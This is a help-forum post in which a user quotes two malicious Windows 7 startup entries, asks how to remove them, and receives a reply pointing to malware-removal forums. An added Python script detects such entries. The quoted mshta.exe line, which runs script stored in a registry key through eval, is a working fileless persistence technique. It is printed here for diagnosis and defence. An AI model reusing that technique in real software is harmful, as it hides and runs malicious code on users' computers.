
Windows 7 Startup Menu files

Two files appear in the Windows startup menu. I'm sure their names are random, but the code they run is below.

"8df70" runs this call: 

C:\Windows\system32\mshta.exe "javascript:C3AOr="zf3c";s45d=new ActiveXObject("WScriptShell");WevUDh2="V084";f2l4Kk=s45d.RegRead("HKCU\\software\\jexxwhetje\\mpjq");aF7cPe4U="QEeMsj";eval(f2l4Kk);S7hma="4";"

"034f6" runs this code using a file in a directory inside the User's area:

C:\Windows\System32\cmd.exe /C start "" "C:\Users\User\AppData\Roaming\0e7ad\6e5b2.10ca43" 

The file in the user's area will immediately replicate itself if deleted or altered. I've seen this behavior in adware, back in the old days.

Any idea how to clean this? Norton Insight doesn't help since cmd.exe and mshta.exe are Windows executables.

Thanks,

Craig
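
A triage sketch for the two startup entries described in the post above, added here as an example and not part of the original post or of any Norton tool: it flags mshta command lines that carry inline script, extracts the registry value they read, and flags a cmd /C start of an AppData file whose extension is not a recognised one. The function names, the extension list and the "benign" entry are assumptions; the other two sample command lines are copied from the post.

```python
import re

# Sample input: the two startup command lines quoted in the post, plus one
# constructed (hypothetical) benign entry for contrast.
SAMPLES = {
    "8df70": r'''C:\Windows\system32\mshta.exe "javascript:C3AOr="zf3c";s45d=new ActiveXObject("WScriptShell");WevUDh2="V084";f2l4Kk=s45d.RegRead("HKCU\\software\\jexxwhetje\\mpjq");aF7cPe4U="QEeMsj";eval(f2l4Kk);S7hma="4";"''',
    "034f6": r'''C:\Windows\System32\cmd.exe /C start "" "C:\Users\User\AppData\Roaming\0e7ad\6e5b2.10ca43"''',
    "benign": r'''"C:\Program Files\Example\updater.exe" /silent''',
}

MSHTA_INLINE = re.compile(r'\bmshta(?:\.exe)?\b.*?\b(?:java|vb)script:', re.I)
REG_READ = re.compile(r'RegRead\(\s*"([^"]+)"', re.I)
CMD_START = re.compile(r'\bcmd(?:\.exe)?\b\s+/c\s+start\b.*?"([^"]*\\AppData\\[^"]+)"', re.I)
KNOWN_EXT = {"exe", "bat", "cmd", "lnk", "vbs", "js", "ps1", "com", "msi"}  # assumed list

def analyze(cmdline):
    """Return a list of (finding, detail) tuples for one startup command line."""
    findings = []
    if MSHTA_INLINE.search(cmdline):
        findings.append(("mshta-inline-script", "script passed on the command line"))
        for key in REG_READ.findall(cmdline):
            # Backslashes are doubled inside the script text; undo that for display.
            findings.append(("registry-payload", key.replace("\\\\", "\\")))
        if re.search(r'\beval\s*\(', cmdline):
            findings.append(("eval", "command line calls eval()"))
    m = CMD_START.search(cmdline)
    if m:
        name = m.group(1).rsplit("\\", 1)[-1]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext not in KNOWN_EXT:
            findings.append(("appdata-unknown-ext", m.group(1)))
    return findings

def triage(entries):
    """Map each flagged entry name to its findings; clean entries are omitted."""
    scanned = ((name, analyze(cmd)) for name, cmd in entries.items())
    return {name: found for name, found in scanned if found}

if __name__ == "__main__":
    for name, found in triage(SAMPLES).items():
        for kind, detail in found:
            print(f"{name}: {kind}: {detail}")
```

The registry path reported for the first entry is where the script body lives, so it is the value to export and inspect alongside the startup shortcut itself.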

Replies


Re: Windows 7 Startup Menu files

Hi @CraigD

Please go to one of these free forums for help in removing your malware. Please share the output of the malware analysis with us if you don't mind.

http://www.bleepingcomputer.com
http://www.geekstogo.com/forum/
http://www.cybertechhelp.com/forums/
http://forums.whatthetech.com/
